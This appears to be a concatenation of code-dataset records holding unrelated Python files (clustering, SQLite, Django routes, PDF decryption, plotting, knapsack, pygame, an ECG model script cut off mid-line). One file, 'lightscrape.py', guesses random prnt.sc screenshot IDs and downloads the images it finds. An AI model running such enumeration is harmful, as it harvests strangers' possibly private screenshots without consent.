"os.path", "line_number": 93, "usage_type": "attribute"}, {"api_name": "argparse.ArgumentParser", "line_number": 98, "usage_type": "call"}]} {"seq_id": "207341497", "text": "from tools.load import LoadMatrix\nfrom sg import sg\nlm=LoadMatrix()\n\ntraindat=lm.load_numbers('../data/fm_train_real.dat')\nparameter_list=[[traindat,10,3],[traindat,11,4]]\ndef clustering_hierarchical (fm_train=traindat, size_cache=10,merges=3):\n\n\tsg('set_features', 'TRAIN', fm_train)\n\tsg('set_distance', 'EUCLIDIAN', 'REAL')\n\tsg('new_clustering', 'HIERARCHICAL')\n\tsg('train_clustering', merges)\n\n\t[merge_distance, pairs]=sg('get_clustering')\n\treturn [merge_distance, pairs]\n\nif __name__=='__main__':\n\tprint('Hierarchical')\n\tclustering_hierarchical(*parameter_list[0])\n", "sub_path": "build/shogun_lib/examples/undocumented/python_static/clustering_hierarchical.py", "file_name": "clustering_hierarchical.py", "file_ext": "py", "file_size_in_byte": 569, "program_lang": "python", "lang": "en", "doc_type": "code", "dataset": "code-starcoder2", "pt": "0", "api": [{"api_name": "tools.load.LoadMatrix", "line_number": 3, "usage_type": "call"}, {"api_name": "sg.sg", "line_number": 9, "usage_type": "call"}, {"api_name": "sg.sg", "line_number": 10, "usage_type": "call"}, {"api_name": "sg.sg", "line_number": 11, "usage_type": "call"}, {"api_name": "sg.sg", "line_number": 12, "usage_type": "call"}, {"api_name": "sg.sg", "line_number": 14, "usage_type": "call"}]} {"seq_id": "395665862", "text": "import sqlite3\r\nfrom sqlite3 import Error\r\n\r\ndef create_connection(db_file):\r\n try:\r\n conn = sqlite3.connect(db_file)\r\n print(sqlite3.version)\r\n return conn\r\n except Error as e:\r\n print(e)\r\n return None\r\n\r\ndef create_task(conn, task):\r\n sql = ''' INSERT INTO tutorial_ticket(id,plugin_id,date,hostname,ip_address,plugin_name)\r\n VALUES(?,?,?,?,?,?) '''\r\n cur = conn.cursor()\r\n cur.execute(sql, task)\r\n return cur.lastrowid\r\n\r\ndef main():\r\n database = \"db.sqlite3\"\r\n conn = create_connection(database)\r\n with conn:\r\n task = ('6','97000','2019-01-07 13:02:15','sbibpl_gns.ad.trw.com','192.168.1.1','NFS Vulnerability')\r\n create_task(conn, task)\r\n\r\nif __name__ == '__main__':\r\n main()\r\n", "sub_path": "update_db.py", "file_name": "update_db.py", "file_ext": "py", "file_size_in_byte": 771, "program_lang": "python", "lang": "en", "doc_type": "code", "dataset": "code-starcoder2", "pt": "0", "api": [{"api_name": "sqlite3.connect", "line_number": 6, "usage_type": "call"}, {"api_name": "sqlite3.version", "line_number": 7, "usage_type": "attribute"}, {"api_name": "sqlite3.Error", "line_number": 9, "usage_type": "name"}]} {"seq_id": "133852254", "text": "from django.urls import path\n\nfrom .views import (\n DetailPlantings,\n client_index,\n coopdetailPlantings,\n plants_par_section,\n projet,\n detail_proj,\n localisation,\n detail_coop,\n # chart,\n prod_coop,\n parcelle_coop,\n localisation_coop,\n section_coop,\n sous_section_coop,\n planting_coop, formations,\n detail_formation,\n export_prod_xls,\n export_parcelle_xls,\n export_prods_to_pdf,\n export_parcelles_to_pdf,\n Plantings,\n # export_plant_xls,\n # export_formation_xls,\n # export_prods_to_pdf,\n # export_parcelles_to_pdf,\n # producteursPDF\n)\n\napp_name='clients'\n\n\nurlpatterns = [\n # path('', connexion, name='connexion'),\n # path('logout', loggout, name='logout'),\n path('index/', client_index, name='dashboard'),\n path('projets/', projet, name='projets'),\n path('formation/', formations, name='formations'),\n path('formation//', detail_formation, name='formation'),\n path('producteurs/', prod_coop, name='prod_coop'),\n path('parcelles/', parcelle_coop, name='parcelle_coop'),\n path('sections/', section_coop, name='section_coop'),\n path('sous_sections/', sous_section_coop, name='sous_section_coop'),\n path('planting/', planting_coop, name='planting_coop'),\n path('coordonnes/', localisation_coop, name='localisation_coop'),\n path('localisation/', localisation, name='localisation'),\n path('Plantings/', Plantings, name='Plantings'),\n path('DetailPlantings/', DetailPlantings, name='DetailPlantings'),\n path('coopdetailPlantings/', coopdetailPlantings, name='coopdetailPlantings'),\n path('plants_par_section/', plants_par_section, name='plants_par_section'),\n \n # path('site_pepinieres/', site_pepinieres, name='site_pepinieres'),\n # path('coop_pepiniere/', coop_pepiniere, name='coop_pepiniere'),\n path('detail_proj/', detail_proj, name='detail_proj'),\n path('detail_coop/', detail_coop, name='detail_coop'),\n # #Charts\n # path('Stats_coop/', Stats_coop, name='stats_coop'),\n # path('Stats_semences/', Stats_semences, name='stats_semences'),\n # path('Production_plan/', Production_plan, name='production_plan'),\n # path('plants_coop/', plants_coop, name='plants_coop'),\n # path('semences_coop/', semences_coop, name='semences_coop'),\n # path('chart/', chart, name='chart'),\n #\n # #Export to Excel\n path('cooperative//producteurs/xls/', export_prod_xls, name='export_prod_xls'),\n # # path('sections/xls/', export_section_xls, name='export_section_xls'),\n # # path('sous_sections/xls/', export_sous_section_xls, name='export_sous_section_xls'),\n path('cooperative//parcelles/xls/', export_parcelle_xls, name='export_parcelle_xls'),\n # path('cooperative//plants/xls/', export_plant_xls, name='export_plant_xls'),\n # path('cooperative//formations/xls/', export_formation_xls, name='export_formation_xls'),\n #\n # # Export Données EN PDF\n path('producteurs/pdf/', export_prods_to_pdf, name='export_prods_to_pdf'),\n # path('producteurs/pdf/', producteursPDF, name='prods_to_pdf'),\n path('parcelles/pdf/', export_parcelles_to_pdf, name='export_parcelles_to_pdf'),\n]\n", "sub_path": "clients/urls.py", "file_name": "urls.py", "file_ext": "py", "file_size_in_byte": 3353, "program_lang": "python", "lang": "en", "doc_type": "code", "dataset": "code-starcoder2", "pt": "0", "api": [{"api_name": "django.urls.path", "line_number": 38, "usage_type": "call"}, {"api_name": "views.client_index", "line_number": 38, "usage_type": "argument"}, {"api_name": "django.urls.path", "line_number": 39, "usage_type": "call"}, {"api_name": "views.projet", "line_number": 39, "usage_type": "argument"}, {"api_name": "django.urls.path", "line_number": 40, "usage_type": "call"}, {"api_name": "views.formations", "line_number": 40, "usage_type": "argument"}, {"api_name": "django.urls.path", "line_number": 41, "usage_type": "call"}, {"api_name": "views.detail_formation", "line_number": 41, "usage_type": "argument"}, {"api_name": "django.urls.path", "line_number": 42, "usage_type": "call"}, {"api_name": "views.prod_coop", "line_number": 42, "usage_type": "argument"}, {"api_name": "django.urls.path", "line_number": 43, "usage_type": "call"}, {"api_name": "views.parcelle_coop", "line_number": 43, "usage_type": "argument"}, {"api_name": "django.urls.path", "line_number": 44, "usage_type": "call"}, {"api_name": "views.section_coop", "line_number": 44, "usage_type": "argument"}, {"api_name": "django.urls.path", "line_number": 45, "usage_type": "call"}, {"api_name": "views.sous_section_coop", "line_number": 45, "usage_type": "argument"}, {"api_name": "django.urls.path", "line_number": 46, "usage_type": "call"}, {"api_name": "views.planting_coop", "line_number": 46, "usage_type": "argument"}, {"api_name": "django.urls.path", "line_number": 47, "usage_type": "call"}, {"api_name": "views.localisation_coop", "line_number": 47, "usage_type": "argument"}, {"api_name": "django.urls.path", "line_number": 48, "usage_type": "call"}, {"api_name": "views.localisation", "line_number": 48, "usage_type": "argument"}, {"api_name": "django.urls.path", "line_number": 49, "usage_type": "call"}, {"api_name": "views.Plantings", "line_number": 49, "usage_type": "argument"}, {"api_name": "django.urls.path", "line_number": 50, "usage_type": "call"}, {"api_name": "views.DetailPlantings", "line_number": 50, "usage_type": "argument"}, {"api_name": "django.urls.path", "line_number": 51, "usage_type": "call"}, {"api_name": "views.coopdetailPlantings", "line_number": 51, "usage_type": "argument"}, {"api_name": "django.urls.path", "line_number": 52, "usage_type": "call"}, {"api_name": "views.plants_par_section", "line_number": 52, "usage_type": "argument"}, {"api_name": "django.urls.path", "line_number": 56, "usage_type": "call"}, {"api_name": "views.detail_proj", "line_number": 56, "usage_type": "argument"}, {"api_name": "django.urls.path", "line_number": 57, "usage_type": "call"}, {"api_name": "views.detail_coop", "line_number": 57, "usage_type": "argument"}, {"api_name": "django.urls.path", "line_number": 67, "usage_type": "call"}, {"api_name": "views.export_prod_xls", "line_number": 67, "usage_type": "argument"}, {"api_name": "django.urls.path", "line_number": 70, "usage_type": "call"}, {"api_name": "views.export_parcelle_xls", "line_number": 70, "usage_type": "argument"}, {"api_name": "django.urls.path", "line_number": 75, "usage_type": "call"}, {"api_name": "views.export_prods_to_pdf", "line_number": 75, "usage_type": "argument"}, {"api_name": "django.urls.path", "line_number": 77, "usage_type": "call"}, {"api_name": "views.export_parcelles_to_pdf", "line_number": 77, "usage_type": "argument"}]} {"seq_id": "620358544", "text": "import PyPDF2\n\npdfReader = PyPDF2.PdfFileReader(open('encrypted.pdf', 'rb'))\n\nprint('pdfReader.isEncrypted: %s' %(pdfReader.isEncrypted))\n\n# The following line will fail fail because the 'encrypted.pdf' file is\n# encrypted with a password of 'rosebud' (The Sims money cheat reference)\n\n# print('Attempting to get the first page from the encrypted PDF: pdfReader.getPage(0): %s' %(pdfReader.getPage(0)))\n\npdfReader.decrypt('rosebud')\n\npageObj = pdfReader.getPage(0)\n\nprint('pageObj: %s' %(pageObj))\n\n\n", "sub_path": "python/03AutomateTheBoringStuffWithPython/13WorkingWithPDFAndWordDocuments/02DecryptingPDFs.py", "file_name": "02DecryptingPDFs.py", "file_ext": "py", "file_size_in_byte": 500, "program_lang": "python", "lang": "en", "doc_type": "code", "dataset": "code-starcoder2", "pt": "12", "api": [{"api_name": "PyPDF2.PdfFileReader", "line_number": 3, "usage_type": "call"}]} {"seq_id": "142386976", "text": "import sys\nimport typesense\nimport unicodedata\n\nfileName = sys.argv[1]\n\nclient = typesense.Client({\n 'nodes': [{\n 'host': 'localhost', # For Typesense Cloud use xxx.a1.typesense.net\n 'port': '8108', # For Typesense Cloud use 443\n 'protocol': 'http' # For Typesense Cloud use https\n }],\n 'api_key': 'xyz',\n 'connection_timeout_seconds': 2\n})\n\n# print(fileName)\ndata = open(fileName,'r').read()\n# jsonl_file = jsonl_file.encode('latin-1', 'replace')\n\n\n# print(data[5861456:5861476])\n# print(str(unicodedata.normalize('NFKD', jsonl_file[5814010:5814020]).encode('ascii', 'ignore')))\n# data = unicodedata.normalize('NFKD', jsonl_file).encode('ascii', 'ignore').decode(\"utf-8\")\n\nreturn_data = client.collections['blogs'].documents.import_(data)\nprint('Documents length: ', len(data.split('\\n'))-1)\nprint('Sucessfully added: ', return_data.count('true'))\n\n", "sub_path": "addDocuments.py", "file_name": "addDocuments.py", "file_ext": "py", "file_size_in_byte": 873, "program_lang": "python", "lang": "en", "doc_type": "code", "dataset": "code-starcoder2", "pt": "12", "api": [{"api_name": "sys.argv", "line_number": 5, "usage_type": "attribute"}, {"api_name": "typesense.Client", "line_number": 7, "usage_type": "call"}]} {"seq_id": "266831972", "text": "\"\"\"Module for Protein Alternate classification.\"\"\"\nimport re\nfrom typing import Optional\n\nfrom bioutils.sequences import aa3_to_aa1_lut\n\nfrom variation.schemas.token_response_schema import Token, TokenMatchType\nfrom .tokenizer import Tokenizer\n\n\nclass ProteinAlternate(Tokenizer):\n \"\"\"The Protein Alternate Tokenization class.\"\"\"\n\n def __init__(self) -> None:\n \"\"\"Initialize the Protein Alternate Tokenizer class.\"\"\"\n self.__splitter = re.compile(r\"\\d+\")\n\n def match(self, input_string: str) -> Optional[Token]:\n \"\"\"Return Protein Alternate tokens if input string matches.\"\"\"\n potential_protein = self.__splitter.split(input_string)\n if all((len(potential_protein) == 2,\n potential_protein[0] in aa3_to_aa1_lut,\n not potential_protein[1])):\n return Token(\n token=potential_protein[0],\n token_type=\"ProteinAlternate\",\n input_string=input_string,\n match_type=TokenMatchType.UNSPECIFIED\n )\n else:\n return None\n", "sub_path": "variation/tokenizers/protein_alternate.py", "file_name": "protein_alternate.py", "file_ext": "py", "file_size_in_byte": 1081, "program_lang": "python", "lang": "en", "doc_type": "code", "dataset": "code-starcoder2", "pt": "12", "api": [{"api_name": "tokenizer.Tokenizer", "line_number": 11, "usage_type": "name"}, {"api_name": "re.compile", "line_number": 16, "usage_type": "call"}, {"api_name": "bioutils.sequences.aa3_to_aa1_lut", "line_number": 22, "usage_type": "name"}, {"api_name": "variation.schemas.token_response_schema.Token", "line_number": 24, "usage_type": "call"}, {"api_name": "variation.schemas.token_response_schema.TokenMatchType.UNSPECIFIED", "line_number": 28, "usage_type": "attribute"}, {"api_name": "variation.schemas.token_response_schema.TokenMatchType", "line_number": 28, "usage_type": "name"}, {"api_name": "typing.Optional", "line_number": 18, "usage_type": "name"}, {"api_name": "variation.schemas.token_response_schema.Token", "line_number": 18, "usage_type": "name"}]} {"seq_id": "478166927", "text": "# Script of derivate computation several h's\n# single point method\nimport numpy as np\nimport matplotlib.pyplot as plt\n\ndef dfdx(f,x,h):\n return (f(x + h) - f(x - h))/(2*h)\n\nn = 200\nx = np.linspace(0, np.pi /50, n + 1)\nh1 = (np.pi /50 )/ n\nepsilon = 5e-324\nho = np.sqrt( (4*epsilon*100)/(10000))\n\n\ndef sin100x(x):\n return np.sin(100*x)\n\ndydx_1 = dfdx(sin100x,x,h1)\ndydx_2 = dfdx(sin100x,x,ho)\n\ndYdx = 100*np.cos(100*x)\n\n#plt.figure(figsize=(12,5))\nplt.plot(x,dydx_1,'.',label='Approx with adjusting h')\nplt.plot(x,dydx_2,'.',label='Approx with optimal h')\n\nplt.plot(x,dYdx,'b',label='Exact Value')\n\nplt.title('Derivative of y = cos(100x)')\nplt.legend(loc='best')\nplt.show()\n", "sub_path": "diff_comp_singlepoint.py", "file_name": "diff_comp_singlepoint.py", "file_ext": "py", "file_size_in_byte": 679, "program_lang": "python", "lang": "en", "doc_type": "code", "dataset": "code-starcoder2", "pt": "12", "api": [{"api_name": "numpy.linspace", "line_number": 10, "usage_type": "call"}, {"api_name": "numpy.pi", "line_number": 10, "usage_type": "attribute"}, {"api_name": "numpy.pi", "line_number": 11, "usage_type": "attribute"}, {"api_name": "numpy.sqrt", "line_number": 13, "usage_type": "call"}, {"api_name": "numpy.sin", "line_number": 17, "usage_type": "call"}, {"api_name": "numpy.cos", "line_number": 22, "usage_type": "call"}, {"api_name": "matplotlib.pyplot.plot", "line_number": 25, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 25, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.plot", "line_number": 26, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 26, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.plot", "line_number": 28, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 28, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.title", "line_number": 30, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 30, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.legend", "line_number": 31, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 31, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.show", "line_number": 32, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 32, "usage_type": "name"}]} {"seq_id": "495737861", "text": "\"\"\"\nGiven a set of items, each with an arbitrary positive weight and a value = 1 or 2 ,\ndetermine which items to include in a collection so that the total weight is less than\nor equal to a given limit and the total value is as large as possible.\n\nFind a polynomial algorithm.\n--\noption:\nstandard knapsack\nbest(weight, with_item) -> best(weight, without_item), best(weight-i, without_item)+ val(item)\n\nat the end, gather\n\"\"\"\nimport collections\n\n\ndef res_knapsack(weights, vals, limit):\n ones = []\n twos = []\n for idx, v in enumerate(vals):\n if v == 1:\n ones.append((weights[idx], idx))\n else:\n twos.append((weights[idx], idx))\n\n ones = collections.deque(sorted(ones))\n twos = collections.deque(sorted(twos))\n\n last_one = None\n weight = 0\n added = set()\n while len(ones) >= 2 and twos:\n one_val = ones[0][0] + ones[1][0]\n two_val = twos[0][0]\n if weight + min(one_val, two_val) > limit:\n break\n if two_val <= one_val:\n w, idx = twos.popleft()\n weight += w\n added.add(idx)\n else:\n w1, idx1 = ones.popleft()\n w2, idx2 = ones.popleft()\n weight += w1 + w2\n added.add(idx1)\n added.add(idx2)\n last_one = (w2, idx2)\n\n while twos and weight + twos[0][0] <= limit:\n w, idx = twos.popleft()\n weight += w\n added.add(idx)\n\n while ones and weight + ones[0][0] <= limit:\n w, idx = ones.popleft()\n weight += w\n added.add(idx)\n last_one = (w, idx)\n\n if last_one:\n if weight - last_one[0] + twos[0][0] <= limit:\n one_w, one_idx = last_one\n weight -= one_w\n added.remove(one_idx)\n two_w, two_idx = twos.popleft()\n weight += two_w\n added.add(two_idx)\n\n return added\n", "sub_path": "lc_discuss/old/batch_2c/restricted_knapsack.py", "file_name": "restricted_knapsack.py", "file_ext": "py", "file_size_in_byte": 1887, "program_lang": "python", "lang": "en", "doc_type": "code", "dataset": "code-starcoder2", "pt": "0", "api": [{"api_name": "collections.deque", "line_number": 26, "usage_type": "call"}, {"api_name": "collections.deque", "line_number": 27, "usage_type": "call"}]} {"seq_id": "450032963", "text": "import pygame\n\npygame.init()\n\nSCREEN_SIZE = 500\nSTEP = 20\n\nscreen = pygame.display.set_mode((SCREEN_SIZE, SCREEN_SIZE))\n\n\nrunning = 1\n\nwhile running:\n event = pygame.event.poll()\n if event.type == pygame.QUIT:\n running = 0\n\n screen.fill((0, 0, 0))\n for y in range(SCREEN_SIZE // STEP):\n pygame.draw.line(screen, (255, 0, 255), (0, y * STEP), (SCREEN_SIZE - y * STEP, 0))\n\n pygame.display.flip()\n", "sub_path": "src/lesson07/lines.py", "file_name": "lines.py", "file_ext": "py", "file_size_in_byte": 424, "program_lang": "python", "lang": "en", "doc_type": "code", "dataset": "code-starcoder2", "pt": "12", "api": [{"api_name": "pygame.init", "line_number": 3, "usage_type": "call"}, {"api_name": "pygame.display.set_mode", "line_number": 8, "usage_type": "call"}, {"api_name": "pygame.display", "line_number": 8, "usage_type": "attribute"}, {"api_name": "pygame.event.poll", "line_number": 14, "usage_type": "call"}, {"api_name": "pygame.event", "line_number": 14, "usage_type": "attribute"}, {"api_name": "pygame.QUIT", "line_number": 15, "usage_type": "attribute"}, {"api_name": "pygame.draw.line", "line_number": 20, "usage_type": "call"}, {"api_name": "pygame.draw", "line_number": 20, "usage_type": "attribute"}, {"api_name": "pygame.display.flip", "line_number": 22, "usage_type": "call"}, {"api_name": "pygame.display", "line_number": 22, "usage_type": "attribute"}]} {"seq_id": "551570972", "text": "from selenium import webdriver\nfrom selenium.webdriver import Chrome\nfrom selenium.webdriver.chrome.options import Options\nimport wget, random, string, os, selenium, sys, platform\n\noptions = Options()\noptions.add_argument(\"--headless\")\noptions.add_argument(\"--window-size=1920x1080\")\noptions.add_experimental_option('excludeSwitches', ['enable-logging'])\n\nBASE_URL = 'https://prnt.sc/'\nlower_alphabet = string.ascii_lowercase\n\nif platform.system() == 'Windows':\n webdriver = \"chromedriver.exe\"\nelif platform.system() == 'Linux':\n webdriver = \"chromedriver\"\nelse:\n print(\"Not supported OS. (Only Windows and Linux)\")\n\ndriver = Chrome(options=options, executable_path=webdriver)\n\ntry:\n os.mkdir('shots')\nexcept:\n print('Dir \"shots\" exists')\nfinally:\n os.chdir('shots')\n\ndef randNL():\n list = []\n for i in range(6):\n choise = random.randint(0,1)\n if choise == 0:\n list.append(random.randint(0,9))\n else:\n list.append(random.choice(lower_alphabet))\n END_URL = ''.join(map(str, list))\n return END_URL\n\ndef main(i):\n for n in range(int(i)):\n while True:\n driver.get(BASE_URL+randNL())\n try:\n img = driver.find_element_by_id('screenshot-image').get_attribute('src')\n if img.__contains__('imgur'):\n print('\\n{}.'.format(str(n+1)))\n wget.download(img)\n break\n except selenium.common.exceptions.NoSuchElementException:\n print('\\nElement not found')\n\nif __name__ == \"__main__\":\n main(sys.argv[1])\n", "sub_path": "lightscrape.py", "file_name": "lightscrape.py", "file_ext": "py", "file_size_in_byte": 1607, "program_lang": "python", "lang": "en", "doc_type": "code", "dataset": "code-starcoder2", "pt": "12", "api": [{"api_name": "selenium.webdriver.chrome.options.Options", "line_number": 6, "usage_type": "call"}, {"api_name": "string.ascii_lowercase", "line_number": 12, "usage_type": "attribute"}, {"api_name": "platform.system", "line_number": 14, "usage_type": "call"}, {"api_name": "selenium.webdriver", "line_number": 15, "usage_type": "name"}, {"api_name": "platform.system", "line_number": 16, "usage_type": "call"}, {"api_name": "selenium.webdriver", "line_number": 17, "usage_type": "name"}, {"api_name": "selenium.webdriver.Chrome", "line_number": 21, "usage_type": "call"}, {"api_name": "selenium.webdriver", "line_number": 21, "usage_type": "name"}, {"api_name": "os.mkdir", "line_number": 24, "usage_type": "call"}, {"api_name": "os.chdir", "line_number": 28, "usage_type": "call"}, {"api_name": "random.randint", "line_number": 33, "usage_type": "call"}, {"api_name": "random.randint", "line_number": 35, "usage_type": "call"}, {"api_name": "random.choice", "line_number": 37, "usage_type": "call"}, {"api_name": "wget.download", "line_number": 49, "usage_type": "call"}, {"api_name": "selenium.common", "line_number": 51, "usage_type": "attribute"}, {"api_name": "sys.argv", "line_number": 55, "usage_type": "attribute"}]} {"seq_id": "277943545", "text": "import torch\nfrom torch.autograd import Variable\nimport torch.optim as optim\nimport torch.nn.functional as F\nimport sys\nfrom dataset import MitbinDataset\nfrom model import TCN\nimport numpy as np\nimport argparse\nfrom collections import defaultdict\nfrom sklearn.metrics import roc_auc_score\nfrom sklearn.metrics import auc\nfrom sklearn.metrics import precision_recall_curve\nfrom sklearn.metrics import f1_score\nfrom sklearn.metrics import accuracy_score,precision_score,recall_score\nimport os\n\nparser = argparse.ArgumentParser(description='Sequence Modeling - MITBIN-TCN')\nparser.add_argument('--batch_size', type=int, default=32, metavar='N',\n help='batch size (default: 32)')\nparser.add_argument('--cuda', action='store_true',\n help='use CUDA (default: True)')\nparser.add_argument('--dropout', type=float, default=0.05,\n help='dropout applied to layers (default: 0.05)')\nparser.add_argument('--clip', type=float, default=-1,\n help='gradient clip, -1 means no clip (default: -1)')\nparser.add_argument('--epochs', type=int, default=10,\n help='upper epoch limit (default: 20)')\nparser.add_argument('--ksize', type=int, default=7,\n help='kernel size (default: 7)')\nparser.add_argument('--levels', type=int, default=8,\n help='# of levels (default: 8)')\nparser.add_argument('--log-interval', type=int, default=500, metavar='N',\n help='report interval (default: 10')\nparser.add_argument('--lr_T', type=float, default=1e-3,\n help='initial learning rate (default: 1e-3)')\nparser.add_argument('--lr_E', type=float, default=1e-3,\n help='initial learning rate (default: 1e-3)')\nparser.add_argument('--lr_G', type=float, default=1e-3,\n help='initial learning rate (default: 1e-3)')\nparser.add_argument('--lr_R', type=float, default=1e-3,\n help='initial learning rate (default: 1e-3)')\nparser.add_argument('--optim', type=str, default='Adam',\n help='optimizer to use (default: Adam)')\nparser.add_argument('--nhid', type=int, default=25,\n help='number of hidden units per layer (default: 25)')\nparser.add_argument('--seed', type=int, default=1111,\n help='random seed (default: 1111)')\nparser.add_argument('--fold', type=int, default=0,\n help='use which fold data (default: 0)')\nparser.add_argument('--num_threds', type=int, default=0,\n help='number of threads to fetch data (default: 0)')\nparser.add_argument('--alpha', type=float, default=1.0,\n help='weight to control loss (default: 1.0)')\nparser.add_argument('--beta', type=float, default=1.0,\n help='weight to control loss (default: 1.0)')\nparser.add_argument('--gamma', type=float, default=1.0,\n help='weight to control loss (default: 1.0)')\nparser.add_argument('--savedir', type=str, default='checkpoint0',\n help='weight to control loss (default: 1.0)')\nargs = parser.parse_args()\n\ntorch.manual_seed(args.seed)\nif torch.cuda.is_available():\n if not args.cuda:\n print(\"WARNING: You have a CUDA device, so you should probably run with --cuda\")\n\ndef mkdir(path):\n if not os.path.exists(path):\n os.makedirs(path)\nmkdir(args.savedir)\n\nbatch_size = args.batch_size\nbatch_size = 1\nn_classes = 2\ninput_channels_T = 3\ninput_channels_E = 1\ninput_channels_G = 1\n\n#seq_length = 500\nepochs = args.epochs\nsteps = 0\nnum_threds = args.num_threds\n\nalpha = args.alpha\nbeta = args.beta\ngamma = args.gamma\n\nprint(args)\ntrain_dataset = MitbinDataset(args, is_for_train=True)\ntrain_loader = torch.utils.data.DataLoader(\n train_dataset,\n batch_size=batch_size,\n shuffle=True,\n num_workers=num_threds,\n drop_last=False)\ntest_dataset = MitbinDataset(args, is_for_train=False)\ntest_loader = torch.utils.data.DataLoader(\n test_dataset,\n batch_size=batch_size,\n shuffle=False,\n num_workers=num_threds,\n drop_last=False)\n\t\t\nchannel_sizes = [args.nhid] * args.levels\nkernel_size = args.ksize\n\nmodel_T = TCN(input_channels_T, n_classes, channel_sizes, kernel_size=kernel_size, dropout=args.dropout)\nmodel_E = TCN(input_channels_E, n_classes, channel_sizes, kernel_size=kernel_size, dropout=args.dropout)\nmodel_G = TCN(input_channels_G, n_classes, channel_sizes, kernel_size=kernel_size, dropout=args.dropout)\n\nif args.cuda:\n model_T.cuda()\n model_E.cuda()\n model_G.cuda()\n \noptimizer = getattr(optim, args.optim)([{'params': model_T.parameters(), 'lr': args.lr_T},\n {'params': model_E.parameters(), 'lr': args.lr_E},\n {'params': model_G.parameters(), 'lr': args.lr_G}\n ])#,momentum=0.9)\n\ndef save_network(network, network_label, epoch_label):\n save_filename = 'net_epoch_%d_id_%s.pth' % (epoch_label, network_label)\n save_path = os.path.join(args.savedir, save_filename)\n torch.save(network.state_dict(), save_path)\n print ('saved net: %s' % save_path)\n \ndef train(ep):\n global steps\n total_loss = 0\n model_T_loss = 0\n model_E_loss = 0\n model_G_loss = 0\n \n model_T.train()\n model_E.train()\n model_G.train()\n \n correct = 0\n \n for batch_idx, (data, data_reverse, order_data, order_data_reverse, \\\n label, subject, feature) in enumerate(train_loader):\n \n data = torch.Tensor(data)\n data_reverse = torch.Tensor(data_reverse)\n order_data = torch.Tensor(order_data)\n order_data_reverse = torch.Tensor(order_data_reverse) \n feature = torch.Tensor(feature)\n target = torch.LongTensor(label)\n \n if args.cuda:\n data, data_reverse, order_data, order_data_reverse, feature, target = data.cuda(), data_reverse.cuda(), order_data.cuda(), order_data_reverse.cuda(), \\\n feature.cuda(), target.cuda()\n \n data = data.view(-1, input_channels_E, data.shape[0])\n data_reverse = data_reverse.view(-1, input_channels_E, data_reverse.shape[0])\n order_data = order_data.view(-1, input_channels_T, order_data.shape[1])\n order_data_reverse = order_data_reverse.view(-1, input_channels_T, order_data_reverse.shape[1])\n \n data, data_reverse, order_data, order_data_reverse, target, feature = Variable(data), Variable(data_reverse), \\\n Variable(order_data), Variable(order_data_reverse), \\\n Variable(target), Variable(feature)\n\n output_T = model_T.forward_T(order_data, order_data_reverse) \n output_E, _ = model_E.forward_E(data, data_reverse, feature)\n output_G, _, _ = model_G.forward_G(data, data_reverse, output_T.detach(), output_E.detach())\n\n #print (output_T.shape)\n #print (output_G.shape)\n #print (output_E.shape)\n\n optimizer.zero_grad()\n loss_T = F.nll_loss(output_T, target)\n loss_E = F.nll_loss(output_E, target)\n loss_G = F.nll_loss(output_G, target)\n\n loss = alpha * loss_T + beta * loss_E + gamma * loss_G\n \n loss.backward()\n optimizer.step()\n total_loss += float(loss)\n #model_T_loss += float(loss_T)\n #model_E_loss += float(loss_E)\n #model_G_loss += float(loss_G)\n\n pred = output_G.data.max(1, keepdim=True)[1]\n correct += pred.eq(target.data.view_as(pred)).cpu().sum()\n\n if batch_idx > 0 and batch_idx % args.log_interval == 0:\n print('Train Epoch: {} [{}/{} ({:.0f}%)]\\tTotal Loss: {:.6f}\\t ACC: {:.4f}'.format(\n ep, batch_idx * batch_size, len(train_dataset),\n 100. * batch_idx / len(train_dataset), total_loss/args.log_interval, float(correct) / (batch_idx*batch_size) ))\n total_loss = 0\n\ndef cal_performance(subject_dic, count_dic, real_dic):\n # vote results\n avg_acc = 0\n ind = 0\n real = []\n logits = []\n for key in subject_dic:\n subject_acc = subject_dic[key] / count_dic[key]\n print ('Subject %d: ACC is %f' %(key, subject_acc))\n ind += 1\n avg_acc += subject_acc\n real.append(real_dic[key])\n if subject_acc > 0.5:\n logit = real_dic[key]\n else:\n logit = 1 - real_dic[key]\n logits.append(logit)\n print ('Avg Subjects: ACC is %f' % (float(avg_acc) / ind))\n y_true = np.array(real)\n y_pred = np.array(logits)\n print ('Accuracy of Classifier:%f' % accuracy_score(y_true, y_pred))\n print ('ROC-AUC of Classifier:%f' % roc_auc_score(y_true, y_pred))\n precision, recall, _thresholds = precision_recall_curve(y_true, y_pred) \n print ('PR-AUC of Classifier:%f' % auc(recall, precision))\n print ('Macro-F1 of Classifier:%f' % f1_score(y_true, y_pred, average='micro'))\n print (\"precision:\", precision_score(y_true, y_pred))\n print (\"recall:\", recall_score(y_true, y_pred))\n \ndef test():\n model_T.eval()\n model_E.eval()\n model_G.eval()\n \n test_loss = 0\n \n correct_T = 0\n correct_E = 0\n correct_G = 0\n subject_dic_T = defaultdict(int)\n subject_dic_E = defaultdict(int)\n subject_dic_G = defaultdict(int)\n \n count_dic = defaultdict(int)\n\n real_dic = {}\n\n with torch.no_grad():\n for data, data_reverse, order_data, order_data_reverse, \\\n label, subject, feature in test_loader:\n data = torch.Tensor(data)\n data_reverse = torch.Tensor(data_reverse)\n order_data = torch.Tensor(order_data)\n order_data_reverse = torch.Tensor(order_data_reverse) \n feature = torch.Tensor(feature)\n target = torch.LongTensor(label)\n \n if args.cuda:\n data, data_reverse, order_data, order_data_reverse, feature, target = data.cuda(), data_reverse.cuda(), order_data.cuda(), order_data_reverse.cuda(), \\\n feature.cuda(), target.cuda()\n \n #seq_length = data.shape[1]\n #print (seq_length)\n data = data.view(-1, input_channels_E, data.shape[0])\n data_reverse = data_reverse.view(-1, input_channels_E, data_reverse.shape[0])\n order_data = order_data.view(-1, input_channels_T, order_data.shape[1])\n order_data_reverse = order_data_reverse.view(-1, input_channels_T, order_data_reverse.shape[1])\n \n data, data_reverse, order_data, order_data_reverse, target, feature = Variable(data), Variable(data_reverse), \\\n 